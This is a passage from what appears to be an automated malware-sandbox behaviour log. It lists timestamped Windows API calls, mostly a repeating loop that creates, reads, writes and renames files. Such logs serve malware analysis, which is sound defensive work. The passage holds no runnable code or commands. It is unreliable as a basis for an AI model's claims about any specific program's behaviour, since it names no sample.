17:41:45,017", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,017", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,017", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,027", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,027", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", 
"api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,037", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,037", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,047", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,047", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,057", "api": 
"NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,057", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,067", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,067", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,077", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,077", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,087", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,087", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,097", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "MoveFileWithProgressW"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:45,097", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,107", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,107", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": 
"2016-02-16 17:41:45,117", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,117", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,127", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,127", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,137", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,137", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,147", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,147", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,157", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": 
"MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,157", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,167", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,167", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtSetInformationFile"}, 
{"category": "process", "timestamp": "2016-02-16 17:41:45,177", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,177", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,187", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,187", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtSetInformationFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,197", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,197", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,207", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,207", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,217", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:45,217", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,217", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,227", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,227", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:45,237", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,237", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,237", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,247", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,247", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", 
"api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,257", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,257", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,267", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,267", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,277", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": 
"NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,277", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,287", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,297", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,297", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtWriteFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,317", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,317", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,327", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,327", "api": "NtReadFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtSetInformationFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtWriteFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtSetInformationFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:45,337", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtCreateFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "MoveFileWithProgressW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:45,337", "api": "NtReadFile"}, {"category": 
